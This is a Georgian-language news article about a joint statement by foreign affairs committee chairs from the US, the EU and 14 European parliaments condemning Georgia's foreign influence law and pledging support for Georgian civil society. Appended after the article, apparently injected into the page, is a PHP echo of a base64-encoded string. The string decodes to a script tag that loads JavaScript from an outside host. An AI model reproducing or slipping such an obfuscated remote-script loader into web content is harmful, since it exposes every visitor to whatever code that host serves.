celsiusi
ავერსი საქკაბელი

 აშშ-ის, ევროკავშირისა და ევროპის 14 ქვეყნის პარლამენტების საგარეო ურთიერთობების კომიტეტების თავმჯდომარეები „უცხოური გავლენის გამჭვირვალობის შესახებ“ კანონის მიღებასთან დაკავშირებით ერთობლივ განცხადებას ავრცელებენ.

როგორც აშშ-ის სენატის ვებგვერდზე გამოქვეყნებულ პრესრელიზშია აღნიშნული, აშშ-ის, ბელგიის, ჩეხეთის, ესტონეთის, ფინეთის, გერმანიის, ისლანდიის, ირლანდიის, იტალიის, ევროკავშირის, ლატვიის, ლიეტუვის, ნორვეგიის, პოლონეთის, უკრაინისა და გაერთიანებული სამეფოს პარლამენტის საგარეო ურთიერთობების კომიტეტების თავმჯდომარეების ერთობლივი განცხადება გამოქვეყნდა მათი შეხვედრის შემდეგ, რომელსაც სენატის საგარეო ურთიერთობების კომიტეტის თავმჯდომარე, სენატორი ბენ კარდინი ხელმძღვანელობდა.

განცხადებაში ნათქვამია, რომ „კანონი ემსახურება თავდასხმას სამოქალაქო საზოგადოებასა და დამოუკიდებელ მედიაზე, რაც დემოკრატიის ფუნდამენტური ელემენტებია“.

ამასთან, საგარეო ურთიერთობების კომიტეტების თავმჯდომარეების განცხადებით, ისინი არასოდეს მიატოვებენ ქართველ ხალხს.

„მეგობრებისა და პარტნიორების მხრიდან გამოთქმული არაერთი შეშფოთების მიუხედავად, საქართველოს პარლამენტმა გადადგა საგანგაშო და რეპრესიული ნაბიჯი, რომელიც ძირს უთხრის დემოკრატიას და ეწინააღმდეგება დასავლეთთან ინტეგრაციის მიზანს. როგორც ევროატლანტიკურ კანონმდებლებს, ჩვენ გვესმის, რომ პარლამენტის როლი არის ხალხის ნების აღსრულება და ქართველებმა ცალსახად უარყვეს კრემლის მიერ შთაგონებული კანონი, როგორც მათ იდენტობასთან, ევროპულ ღირებულებებსა და დემოკრატიის პრინციპებთან შეუთავსებელი. მარტივად რომ ვთქვათ, ე.წ. უცხოური აგენტის კანონი არის ვლადიმერ პუტინის პოლიტიკის ანარეკლი, რომელიც აგრძელებს არაკანონიერად საქართველოს ტერიტორიების 20%-ის ოკუპაციას.

პატივსაცემი ქართული ორგანიზაციები, როგორებიც არიან „საერთაშორისო გამჭვირვალობა – საქართველო“ (TI Georgia), „სამართლიანი არჩევნებისა და დემოკრატიის საერთაშორისო საზოგადოება“ (ISFED) და „ახალგაზრდა იურისტთა ასოციაცია“ (GYLA) ძალიან მნიშვნელოვან როლს თამაშობენ საქართველოს ევროატლანტიკური ინტეგრაციის გზაზე. ეს კანონი არის გამოწვევა ასეთი ღირსეული ძალისხმევისთვის და ემსახურება პირდაპირ თავდასხმას სამოქალაქო საზოგადოებასა და დამოუკიდებელ მედიაზე, რაც ნებისმიერი დემოკრატიის ფუნდამენტური ელემენტებია. ამერიკის შეერთებული შტატები და ევროპა გააგრძელებს მათ მხარდაჭერას, რადგან მათი ხელმძღვანელობა და საქართველოს ხედვა ასახავს ნამდვილ პატრიოტიზმს, განსხვავებით პარლამენტის 84 წევრისგან, რომლებმაც საკუთარი თავი გუშინდელ კენჭისყრაზე რუსეთს შეუერთეს.

ჩვენ არასდროს მივატოვებთ ქართველ ხალხს, რომელმაც მშვიდობიანი წინააღმდეგობით გაბედულად გამოავლინა თავისი მტკიცე ერთგულება დემოკრატიული ღირებულებების მიმართ. ასევე, არ ვიყოყმანებთ, პასუხისმგებლობა დავაკისროთ იმ პირებს, რომლებიც პასუხისმგებელი არიან ამ რუსული სტილის კანონის მიღებასა და არაძალადობრივი დემონსტრანტების მიზანში ამოღებაში, მათ შორის ბიძინა ივანიშვილსა და მის გარემოცვას. ქართველ ხალხს კი ვუცხადებთ, რომ თქვენ მარტო არ ხართ“, – აღნიშნულია განცხადებაში.

209
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");